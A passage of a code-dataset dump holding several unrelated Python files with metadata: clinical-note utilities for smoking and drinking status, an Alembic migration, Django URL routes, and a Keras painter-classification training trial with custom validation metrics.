findFISH(nps, heads={}, section=\"\"):\n    fishes = []\n\n    fish_re = re.compile(r'\\bfish\\b', re.IGNORECASE)\n\n    nps_in = getEntitiesInSection(nps, heads=heads, section=section)\n\n    for key in nps_in:\n        m = fish_re.search(nps_in[key][\"content\"])\n        if m != None:\n            fishes.append(nps_in[key][\"content\"])\n\n    return fishes\n\n# determine drinking and smoking status\n# returns 1 for positive, -1 for negative and 0 for unknown\n# TODO: differentiate between patient and relatives' status\ndef determineDrinkingAndSmoking(sentences, modifiers, targets, mode, heads={}, section=\"\"):\n    indexed_sentences = sentences.copy()\n    addSentenceNumber_new(indexed_sentences, sentences)\n    sentences_in = {}\n\n    if mode == \"smoking\":\n        regex = SMOKING_REGEX\n        target_cat = \"smoking\"\n    else:\n        regex = DRINKING_REGEX\n        target_cat = \"drinking\"\n\n    for s in indexed_sentences:\n        for r in regex:\n            m = r.search(s[\"content\"])\n            if m != None: sentences_in[s[\"sen_id\"]] = s\n        # for r in DRINKING_REGEX:\n        #     m = r.search(s[\"content\"])\n        #     if m != None and s[\"sen_id\"]: sentences_in[s[\"sen_id\"]] = s\n\n    if bool(sentences_in) == False: return 0\n\n    status = True\n    for key in sentences_in:\n        str = sentences_in[key][\"content\"]\n        markup = pyConText.ConTextMarkup()\n        markup.setRawText(str.lower())\n\n        markup.cleanText()\n\n        markup.markItems(modifiers, mode=\"modifier\")\n        markup.markItems(targets, mode=\"target\")\n\n        markup.pruneMarks()\n\n        markup.applyModifiers()\n        edges = markup.edges()\n\n        negation_cat = \"definite_negated_existence\"\n\n        negation_existed = False\n        target_existed = False\n\n        for edge in edges:\n            edge_existed = (len(edge) > 0)\n            for node in edge:\n                categories = node.getCategory()\n                for c in categories:\n                    if c == negation_cat: negation_existed = True\n                    if c == target_cat: target_existed = True\n\n        if negation_existed and target_existed: status = False\n\n    return 1 if status == True else -1\n\n# return entities in a certain range only\ndef boundEntities(entities, beg, end, mode=\"indexed\"):\n\n    if mode == \"indexed\":\n        entities_in = {}\n\n        for key in entities:\n            if entities[key][\"beg\"] >= beg and entities[key][\"end\"] <= end:\n                entities_in[key] = entities[key]\n        return entities_in\n\n    if mode == \"nonindexed\":\n        entities_in = []\n\n        for entity in entities:\n            if entity[\"beg\"] >= beg and entity[\"end\"] <= end:\n                entities_in.append(entity)\n        return 
entities_in", "sub_path": "Old/Utils.py", "file_name": "Utils.py", "file_ext": "py", "file_size_in_byte": 37854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 24, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 32, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 33, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 35, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 37, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 38, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 48, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 48, 
"usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 50, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 51, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 51, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 52, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 57, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 58, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 58, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 59, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 61, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 61, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 63, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 64, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 64, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 65, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 65, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 66, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 67, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 67, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 68, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 69, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 70, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 75, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 76, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 76, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 77, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 78, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 78, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 79, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 80, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 80, "usage_type": "attribute"}, {"api_name": 
"re.compile", "line_number": 81, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 81, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 86, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 87, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 87, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 88, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 88, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 89, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 90, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 91, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 91, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 99, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 100, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 104, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 104, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 105, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 105, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 110, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 110, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 111, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 112, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 112, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 113, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 114, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 114, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 115, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 115, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 116, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 116, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 117, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 118, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 119, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 119, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 120, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 120, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 125, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 129, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 129, "usage_type": "attribute"}, {"api_name": "re.compile", 
"line_number": 130, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 130, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 131, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 131, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 132, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 133, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 133, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 137, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 137, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 138, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 142, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 142, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 143, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 143, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 144, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 144, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 145, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 145, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 146, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 146, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 147, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 147, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 151, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 151, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 152, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 153, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 153, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 154, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 154, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 155, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 155, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 158, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 161, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 161, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 162, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 162, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 163, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 163, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 164, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 164, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 165, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 166, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 166, "usage_type": "attribute"}, {"api_name": "re.compile", 
"line_number": 167, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 167, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 168, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 168, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 169, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 170, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 170, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 171, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 171, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 172, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 172, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 173, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 173, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 174, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 174, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 175, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 175, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 176, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 176, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 177, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 177, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 178, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 178, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 179, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 179, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 180, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 180, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 181, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 181, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 182, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 182, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 183, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 183, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 184, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 184, "usage_type": "attribute"}, {"api_name": "xml.etree.cElementTree.iterparse", "line_number": 219, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree", "line_number": 219, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 519, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 519, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 523, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 526, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 772, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 872, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 872, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 873, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 873, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 909, "usage_type": "call"}, {"api_name": 
"re.IGNORECASE", "line_number": 909, "usage_type": "attribute"}, {"api_name": "pyConTextNLP.pyConTextGraph.ConTextMarkup", "line_number": 948, "usage_type": "call"}, {"api_name": "pyConTextNLP.pyConTextGraph", "line_number": 948, "usage_type": "name"}]} +{"seq_id": "361116916", "text": "\"\"\"empty message\n\nRevision ID: d75bb81b399a\nRevises: 0cccc063c7da\nCreate Date: 2018-01-29 15:28:14.881306\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd75bb81b399a'\ndown_revision = '0cccc063c7da'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('alert', sa.Column('description', sa.String(length=128), nullable=True))\n op.drop_column('alert', 'title')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('alert', sa.Column('title', sa.VARCHAR(length=128), autoincrement=False, nullable=True))\n op.drop_column('alert', 'description')\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/d75bb81b399a_.py", "file_name": "d75bb81b399a_.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "265188433", "text": "from django.conf.urls import url\n\nfrom events import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^create/$', views.create, name='create'),\n url(r'^new/$', views.new, name='newEvents'),\n url(r'^feature/$', views.feature, name='featureEvents'),\n url(r'^search/$', views.search, name='searchEvents'),\n url(r'^update/$', views.update, name='updateEvents'),\n\n # ex: /polls/5/\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^(?P[0-9]+)/addNotify/$', views.addNotify, name='addNotify'),\n url(r'^(?P[0-9]+)/edit$', views.edit, name='edit'),\n url(r'^(?P[0-9]+)/delete$', views.delete, name='delete'),\n]\n", "sub_path": "events/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "events.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "events.views.create", "line_number": 7, "usage_type": "attribute"}, 
{"api_name": "events.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "events.views.new", "line_number": 8, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "events.views.feature", "line_number": 9, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "events.views.search", "line_number": 10, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "events.views.update", "line_number": 11, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "events.views.detail", "line_number": 14, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "events.views.addNotify", "line_number": 15, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "events.views.edit", "line_number": 16, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "events.views.delete", "line_number": 17, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "482460580", "text": "from keras.losses import categorical_crossentropy\nfrom keras.optimizers import Adam\nimport tensorflow as tf\n\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, accuracy_score\n\nimport pedl\nfrom pedl.frameworks.keras import KerasTrial\nfrom pedl.frameworks.keras.data import KerasDataAdapter\n\nfrom train_cnn import _cnn\nfrom data_provider import load_organized_data_info, train_val_dirs_generators\nfrom validation import _create_pairs_generator, IMGS_DIM_1D\nfrom utils import pairs_dot\nfrom config import *\n\n\nclass PainterTrial(KerasTrial):\n def __init__(self, hparams):\n super().__init__(hparams)\n\n self.kernel_size = pedl.get_hyperparameter(\"kernel_size\")\n self.dropout = pedl.get_hyperparameter(\"dropout\")\n self.pool_size = pedl.get_hyperparameter(\"pool_size\")\n self.l2_reg = pedl.get_hyperparameter(\"l2_reg\")\n self.lr = pedl.get_hyperparameter(\"lr\")\n self.my_batch_size = pedl.get_hyperparameter(\"batch_size\")\n self.data_info = load_organized_data_info(IMGS_DIM_1D)\n\n def build_model(self, hparams):\n return _cnn(IMGS_DIM_3D)\n\n def optimizer(self):\n adam = Adam(lr=self.lr)\n return adam\n\n def loss(self):\n return categorical_crossentropy\n\n def batch_size(self):\n return self.my_batch_size\n\n # This is an abstract function which the trial class needs for instantiation.\n def validation_metrics(self):\n return {}\n\n # HACK: compute the validation metrics in a customized way.\n def compute_validation_metrics(self, step_id):\n assert self.validation_data_adapter is not None\n assert self.model is not None\n\n 
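# flow sketch (explanatory comments only, assumed semantics): the loop below runs the trained\n        # model over every validation batch, stacks the per-batch softmax outputs, and then scores\n        # them with cross entropy, single-image accuracy, and a pairwise same-artist ROC AUC.\n        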
self.validation_data_adapter.start(is_validation=True)\n        validation_iterator = self.validation_data_adapter.get_iterator()\n        assert validation_iterator is not None\n\n        # TODO: preallocate numpy arrays\n        X_val_embedded = None\n        y_val = None\n\n        # Shape of X_batch: (96=batch_size, 3, 256, 256 (dims of a single image)).\n        # Shape of y_batch: (96=batch_size, number of classes).\n        num_inputs = 0\n        for X_batch, y_batch in validation_iterator:\n            # Shape of X_embedded: (96=batch_size, number of classes).\n            X_embedded = self.model.predict(X_batch)\n\n            # Shape of X_val_embedded: (iteration * batch_size, number of classes).\n            if X_val_embedded is None:\n                X_val_embedded = X_embedded\n            else:\n                X_val_embedded = np.concatenate((X_val_embedded, X_embedded), axis=0)\n\n            # Shape of y_val: number of (iteration * batch_size, number of classes).\n            if y_val is None:\n                y_val = y_batch\n            else:\n                y_val = np.concatenate((y_val, y_batch), axis=0)\n            num_inputs += len(X_batch)\n\n        self.validation_data_adapter.stop()\n\n        # Calculate categorical cross entropy for validation data,\n        # which is the same loss as used in training\n        y_pred_vec = tf.convert_to_tensor(X_val_embedded)\n        y_val_vec = tf.convert_to_tensor(y_val)\n        cce = categorical_crossentropy(y_val_vec, y_pred_vec)\n        with tf.Session().as_default():\n            cce = cce.eval()\n        cce = np.mean(cce)\n\n        # Calculate accuracy of single image artist classification.\n        # Class prediction is the class with max prob in vector\n        # prediction of each painting.\n        y_val = np.argmax(y_val, axis=1)\n        y_pred = np.argmax(X_val_embedded, axis=1)\n        single_painting_acc = accuracy_score(y_val, y_pred)\n\n        # Pairwise evaluation: whether they are from the same artist\n        batches_val = _create_pairs_generator(\n            X_val_embedded, y_val, lambda u, v: [u, v],\n            num_groups=32,\n            batch_size=1000000)\n\n        y_pred, y_true = np.array([]), np.array([])\n        for X, y in batches_val:\n            y_pred = np.hstack((y_pred, pairs_dot(X)))\n            y_true = np.hstack((y_true, y))\n        roc_auc = roc_auc_score(y_true, y_pred)\n\n        return {\"num_inputs\": num_inputs,\n                \"validation_metrics\": {'roc_auc': roc_auc,\n                                       'categorical_crossentropy': cce,\n                                       'single_painting_accuracy': single_painting_acc}}\n\ndef make_data_loaders(experiment_config, hparams):\n    # multi_crop improves training, but was not used for author's submission\n    data_info = load_organized_data_info(IMGS_DIM_3D[1], multi_crop=True)\n    dir_tr = data_info['dir_tr']\n    dir_val = data_info['dir_val']\n\n    gen_tr, gen_val = train_val_dirs_generators(BATCH_SIZE, dir_tr, dir_val)\n\n    gen_tr = KerasDataAdapter(gen_tr, workers=16, use_multiprocessing=True)\n    gen_val = KerasDataAdapter(gen_val, workers=16, use_multiprocessing=True)\n\n    return (gen_tr, gen_val)\n\n\n\n\n", "sub_path": "painters/model_def_standard.py", "file_name": "model_def_standard.py", "file_ext": "py", "file_size_in_byte": 4840, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pedl.frameworks.keras.KerasTrial", "line_number": 19, "usage_type": "name"}, {"api_name": "pedl.get_hyperparameter", "line_number": 23, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 24, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 25, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 26, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 27, "usage_type": "call"}, {"api_name": "pedl.get_hyperparameter", "line_number": 28, "usage_type": "call"},
